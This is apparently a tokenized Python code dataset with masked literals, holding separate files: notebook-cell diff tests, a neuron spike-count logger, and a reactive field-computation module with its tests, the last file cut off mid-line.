u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } ] <EOL> result = cells_diff ( A , B , check_modified = False ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' 
<EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_modified ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:k>' ] } ] <EOL> result = cells_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_lines_same ( ) : <EOL> A = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = lines_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_lines_different ( ) : <EOL> A = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = lines_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> 
assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:3> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_words_same ( ) : <EOL> A = "<STR_LIT>" <EOL> B = "<STR_LIT>" <EOL> result = words_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_empty_lines ( ) : <EOL> A = [ '<STR_LIT>' ] <EOL> B = [ '<STR_LIT>' ] <EOL> result = lines_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_empty_words ( ) : <EOL> A = "<STR_LIT>" <EOL> B = "<STR_LIT:U+0020>" <EOL> result = words_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:3> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_words_different ( ) : <EOL> A = "<STR_LIT>" <EOL> B = "<STR_LIT>" <EOL> result = words_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:3> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_word ( ) : <EOL> A = "<STR_LIT>" <EOL> B = "<STR_LIT>" <EOL> result = words_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_word2 ( ) : <EOL> A = "<STR_LIT>" <EOL> B = "<STR_LIT>" <EOL> result = words_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ 
'<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_cells_same ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> result = cells_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_cells_different 
( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:y>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:w>' ] } <EOL> ] <EOL> result = cells_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_empty ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ 
<EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ ] } ] <EOL> result = cells_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_modified2 ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , 
u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:k>' ] } <EOL> ] <EOL> result = cells_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_modified_items ( ) : <EOL> header_item = { <EOL> '<STR_LIT:state>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : CellComparator ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:source>' : '<STR_LIT>' , <EOL> } ) , <EOL> '<STR_LIT>' : CellComparator ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:source>' : '<STR_LIT>' , <EOL> } ) , <EOL> } <EOL> code_item = { <EOL> '<STR_LIT:state>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : CellComparator ( { <EOL> '<STR_LIT>' : '<STR_LIT:code>' , <EOL> '<STR_LIT:input>' : '<STR_LIT>' , <EOL> } ) , <EOL> '<STR_LIT>' : CellComparator ( { <EOL> '<STR_LIT>' : '<STR_LIT:code>' , <EOL> '<STR_LIT:input>' : '<STR_LIT>' , <EOL> } ) , <EOL> } <EOL> cellslist = [ <EOL> { '<STR_LIT:state>' : '<STR_LIT>' , '<STR_LIT:value>' : '<STR_LIT:foo>' } , <EOL> header_item , <EOL> code_item , <EOL> ] <EOL> result = diff_modified_items ( cellslist ) <EOL> assert <NUM_LIT:0> not in result <EOL> assert len ( result [ <NUM_LIT:1> ] ) == <NUM_LIT:5> <EOL> assert len ( result [ <NUM_LIT:2> ] ) == <NUM_LIT:3> </s>
<s> class report_results_and_logging : <EOL> def __init__ ( self , dictionaryLongitude , epochsToPrint , M , Mv , epochIndex , spikeIntervalUnformatted , dictionary , epochMsDuration ) : <EOL> self . epochsToPrint = epochsToPrint <EOL> self . dictionaryLongitude = dictionaryLongitude <EOL> self . M = M <EOL> self . Mv = Mv <EOL> self . epochIndex = epochIndex <EOL> self . spikeIntervalUnformatted = spikeIntervalUnformatted <EOL> self . dictionary = dictionary <EOL> self . epochMsDuration = epochMsDuration <EOL> print '<STR_LIT>' , self . epochIndex <EOL> SpikeNumberInEpoch = [ <NUM_LIT:0> ] * self . dictionaryLongitude <EOL> for NeuronNumber in range ( self . dictionaryLongitude ) : <EOL> for spikeOccurenceTime in self . M [ NeuronNumber ] : <EOL> if ( spikeOccurenceTime >= ( self . epochIndex * self . spikeIntervalUnformatted ) and spikeOccurenceTime < ( ( self . epochIndex * self . spikeIntervalUnformatted ) + ( self . spikeIntervalUnformatted - <NUM_LIT> ) ) ) : <EOL> SpikeNumberInEpoch [ NeuronNumber ] = SpikeNumberInEpoch [ NeuronNumber ] + <NUM_LIT:1> <EOL> self . SpikeNumberInEpoch = SpikeNumberInEpoch <EOL> def presenter ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> print ( sum ( self . SpikeNumberInEpoch ) / self . dictionaryLongitude ) <EOL> print ( '<STR_LIT>' ) <EOL> for NeuronNumber in range ( self . dictionaryLongitude ) : <EOL> print self . dictionary . dictionary [ NeuronNumber ] [ <NUM_LIT:0> ] , '<STR_LIT::>' , self . SpikeNumberInEpoch [ NeuronNumber ] , '<STR_LIT:U+0020>' , <EOL> print ( '<STR_LIT:U+0020>' ) <EOL> SortedMvForEpoch = [ ] <EOL> for neuronIndex in range ( self . dictionaryLongitude ) : <EOL> SortedMvForEpoch . append ( sum ( self . Mv [ neuronIndex ] [ ( self . epochIndex * self . epochMsDuration ) : ( self . epochMsDuration + ( self . epochIndex * self . 
epochMsDuration ) ) ] ) ) <EOL> SortedMvForEpoch = sorted ( SortedMvForEpoch ) <EOL> print ( '<STR_LIT>' ) <EOL> print SortedMvForEpoch [ <NUM_LIT:3> ] - SortedMvForEpoch [ <NUM_LIT:2> ] <EOL> print ( '<STR_LIT>' ) <EOL> print SortedMvForEpoch [ <NUM_LIT:3> ] - ( sum ( SortedMvForEpoch [ <NUM_LIT:0> : ( self . dictionaryLongitude - <NUM_LIT:1> ) ] ) / ( self . dictionaryLongitude - <NUM_LIT:1> ) ) <EOL> def logger ( self , outputFile ) : <EOL> if self . epochIndex == <NUM_LIT:0> : <EOL> outputStatement = [ '<STR_LIT>' ] <EOL> outputFile . writelines ( outputStatement ) <EOL> for neuronIndex in range ( self . dictionaryLongitude ) : <EOL> priorMvInEpoch = <NUM_LIT:0> <EOL> totalPositiveMembraneMv = <NUM_LIT:0> <EOL> for MvInEpoch in self . Mv [ neuronIndex ] [ ( self . epochIndex * self . epochMsDuration ) : ( self . epochMsDuration + ( self . epochIndex * self . epochMsDuration ) ) ] : <EOL> if MvInEpoch > <NUM_LIT:0> : <EOL> totalPositiveMembraneMv = totalPositiveMembraneMv + MvInEpoch <EOL> outputStatement = [ str ( self . dictionary . dictionary [ neuronIndex ] [ <NUM_LIT:0> ] ) , '<STR_LIT:\t>' , str ( self . epochIndex ) , '<STR_LIT:\t>' , str ( totalPositiveMembraneMv ) , '<STR_LIT:\t>' , str ( self . SpikeNumberInEpoch [ neuronIndex ] ) , '<STR_LIT:\n>' ] <EOL> outputFile . writelines ( outputStatement ) </s>
<s> __version__ = '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> import fieldtree <EOL> class Packet ( object ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self ) : <EOL> self . objects = { } <EOL> self . index = { } <EOL> self . sensors = set ( ) <EOL> Service . packet = self <EOL> def __str__ ( self ) : <EOL> objects = self . objects . iteritems ( ) <EOL> items = ( '<STR_LIT>' % ( a , b ) for a , b in objects ) <EOL> return '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( items ) <EOL> def object ( self , name ) : <EOL> this = ObjectName ( name ) <EOL> obj = Object ( self , { '<STR_LIT>' : this } ) <EOL> self . add ( obj ) <EOL> return obj , this <EOL> def add ( self , obj ) : <EOL> assert isinstance ( obj , Object ) <EOL> identifier = obj [ '<STR_LIT>' ] <EOL> self . objects [ identifier ] = obj <EOL> def add_sensor ( self , sensor ) : <EOL> sensor . packet = self <EOL> self . sensors . add ( sensor ) <EOL> def get ( self , n ) : <EOL> return self . objects [ n . object ] [ n . label ] <EOL> def commit ( self ) : <EOL> changeset = { } <EOL> for name , object in self . objects . iteritems ( ) : <EOL> if object . has_changes ( ) : <EOL> changeset [ name ] = object . get_changes ( ) <EOL> for name , fields in changeset . iteritems ( ) : <EOL> for key , ( label , value ) in fields . iteritems ( ) : <EOL> if isinstance ( value , set ) : <EOL> value = frozenset ( value ) <EOL> if not self . index . has_key ( key ) : <EOL> self . index [ key ] = { } <EOL> self . index [ key ] . setdefault ( value , set ( ) ) . add ( name ) <EOL> for sensor in self . sensors : <EOL> if sensor . matches ( changeset ) : <EOL> sensor . notify ( changeset ) <EOL> class Object ( fieldtree . FieldTree ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , packet , fields ) : <EOL> self . packet = packet <EOL> self . __changes = { } <EOL> self . __depth = <NUM_LIT:0> <EOL> self . __error = None <EOL> if isinstance ( fields , dict ) : <EOL> fields = fields . items ( ) <EOL> super ( Object , self ) . 
__init__ ( * fields ) <EOL> def __str__ ( self ) : <EOL> items = ( '<STR_LIT>' % ( a , b ( ) if computation ( b ) else b ) <EOL> for a , b in self . fields ( ) ) <EOL> return '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( items ) <EOL> def __getitem__ ( self , label ) : <EOL> value = super ( Object , self ) . __getitem__ ( label ) <EOL> if computation ( value ) : <EOL> self . __depth += <NUM_LIT:1> <EOL> try : value = value ( ) <EOL> except Exception , e : <EOL> if self . __error is None : <EOL> self . __error = Error ( e ) <EOL> self . __depth -= <NUM_LIT:1> <EOL> if ( self . __depth == <NUM_LIT:0> ) and ( self . __error is not None ) : <EOL> value = self . __error <EOL> self . __error = None <EOL> return value <EOL> def update ( self , fields ) : <EOL> if isinstance ( fields , dict ) : <EOL> if fields . has_key ( '<STR_LIT>' ) : <EOL> del self . packet . objects [ self [ '<STR_LIT>' ] ] <EOL> self . packet . objects [ fields [ '<STR_LIT>' ] ] = self <EOL> fields = fields . items ( ) <EOL> super ( Object , self ) . update ( fields ) <EOL> else : <EOL> super ( Object , self ) . update ( fields , ignore = '<STR_LIT>' ) <EOL> def changed ( self , * keys ) : <EOL> for key in keys : <EOL> field = self . get_field ( key ) <EOL> self . __changes [ key ] = field <EOL> def has_changes ( self ) : <EOL> return len ( self . __changes ) > <NUM_LIT:0> <EOL> def get_changes ( self ) : <EOL> changes = self . __changes . copy ( ) <EOL> self . __changes = { } <EOL> return changes <EOL> def Service ( original ) : <EOL> "<STR_LIT>" <EOL> def compute ( ) : <EOL> "<STR_LIT>" <EOL> def value ( n ) : <EOL> if n . name in Service . accessed : <EOL> raise CycleError ( "<STR_LIT>" % n . name ) <EOL> Service . accessed . add ( n . name ) <EOL> return Service . packet . get ( n ) <EOL> def evaluate ( arg ) : <EOL> if isinstance ( arg , ValueName ) : <EOL> return value ( arg ) <EOL> elif computation ( arg ) : <EOL> return arg ( ) <EOL> else : return arg <EOL> accessed = Service . accessed . 
copy ( ) <EOL> args = [ evaluate ( arg ) for arg in compute . args ] <EOL> result = compute . original ( * args ) <EOL> Service . accessed = accessed <EOL> return result <EOL> compute . original = original <EOL> def define ( * args ) : <EOL> "<STR_LIT>" <EOL> compute . args = args <EOL> return compute <EOL> return define <EOL> Service . packet = None <EOL> Service . accessed = set ( ) <EOL> @ Service <EOL> def Sum ( a , b ) : <EOL> return a + b <EOL> @ Service <EOL> def Interest ( a , b ) : <EOL> return a + ( a * b ) <EOL> @ Service <EOL> def Get ( a , b ) : <EOL> return a [ b ] <EOL> class Sensor ( object ) : <EOL> def __init__ ( self , obj ) : <EOL> self . packet = None <EOL> self . output = obj <EOL> self . optional_patterns = set ( ) <EOL> self . mandatory_patterns = set ( ) <EOL> self . matched = set ( ) <EOL> def optional ( self , function ) : <EOL> self . optional_patterns . add ( function ) <EOL> def mandatory ( self , function ) : <EOL> self . mandatory_patterns . add ( function ) <EOL> def matches ( self , changeset ) : <EOL> optional = set ( ) <EOL> mandatory = set ( ) <EOL> self . matched = set ( ) <EOL> for opt in self . optional_patterns : <EOL> o = [ opt ( fields ) for name , fields in changeset . iteritems ( ) ] <EOL> optional . add ( o . count ( True ) ) <EOL> if o . count ( True ) : <EOL> self . matched . add ( opt . __name__ ) <EOL> for man in self . mandatory_patterns : <EOL> m = [ man ( fields ) for name , fields in changeset . iteritems ( ) ] <EOL> mandatory . add ( m . count ( True ) ) <EOL> if m . count ( True ) : <EOL> self . matched . add ( man . __name__ ) <EOL> return any ( optional or [ True ] ) and all ( mandatory or [ True ] ) <EOL> def notify ( self , changeset ) : <EOL> self . output . update ( { '<STR_LIT>' : str ( id ( self ) ) } ) <EOL> self . output . update ( { '<STR_LIT>' : self . packet } ) <EOL> self . output . update ( { '<STR_LIT>' : self . 
matched } ) <EOL> class Schema ( object ) : <EOL> def __init__ ( self , ** kargs ) : <EOL> self . properties = kargs <EOL> def __call__ ( self , obj ) : <EOL> import new <EOL> for key , value in self . properties . iteritems ( ) : <EOL> function = lambda self = self , value = value : self [ value ] <EOL> method = new . instancemethod ( function , obj , type ( obj ) ) <EOL> setattr ( obj , key , method ) <EOL> return obj <EOL> class ObjectName ( str ) : <EOL> def __call__ ( self , label ) : <EOL> return ValueName ( self , label ) <EOL> class ValueName ( object ) : <EOL> def __init__ ( self , object , label ) : <EOL> self . object = object <EOL> self . label = label <EOL> self . name = object + '<STR_LIT:.>' + label <EOL> class Error ( object ) : <EOL> def __init__ ( self , e ) : <EOL> self . exception = e <EOL> def __repr__ ( self ) : <EOL> args = ( type ( self . exception ) . __name__ , str ( self . exception ) ) <EOL> return '<STR_LIT>' % args <EOL> class CycleError ( Exception ) : <EOL> "<STR_LIT>" <EOL> def computation ( obj ) : <EOL> "<STR_LIT>" <EOL> return callable ( obj ) and hasattr ( obj , '<STR_LIT>' ) <EOL> def account_test ( ) : <EOL> packet = Packet ( ) <EOL> account , this = packet . object ( '<STR_LIT>' ) <EOL> total = Sum ( this ( '<STR_LIT>' ) , this ( '<STR_LIT>' ) ) <EOL> account . update ( { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : - <NUM_LIT> , <EOL> '<STR_LIT>' : total , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : Interest ( this ( '<STR_LIT>' ) , this ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : Interest ( total , this ( '<STR_LIT>' ) ) , <EOL> } ) <EOL> total = account [ '<STR_LIT>' ] <EOL> adjusted = account [ '<STR_LIT>' ] <EOL> account [ '<STR_LIT>' ] += <NUM_LIT:1000> <EOL> total_ = account [ '<STR_LIT>' ] <EOL> adj_ = account [ '<STR_LIT>' ] <EOL> print total , adjusted , total_ , adj_ <EOL> packet . commit ( ) <EOL> print packet . index <EOL> def cycle_test ( ) : <EOL> packet = Packet ( ) <EOL> cycle , this = packet . 
